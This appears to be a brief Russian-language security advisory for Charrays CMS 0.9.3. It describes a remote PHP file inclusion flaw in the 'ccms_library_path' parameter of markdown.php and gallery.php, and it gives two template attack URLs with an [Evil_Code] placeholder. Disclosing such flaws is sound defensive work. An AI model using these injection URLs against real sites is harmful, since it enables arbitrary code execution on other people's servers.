Программа: Charrays CMS 0.9.3
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «ccms_library_path» сценариями markdown.php и gallery.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
Пример:
http://[site]/[path]/decoder/markdown.php?ccms_library_path=[Evil_Code]
http://[site]/[path]/decoder/gallery.php?ccms_library_path=[Evil_Code]
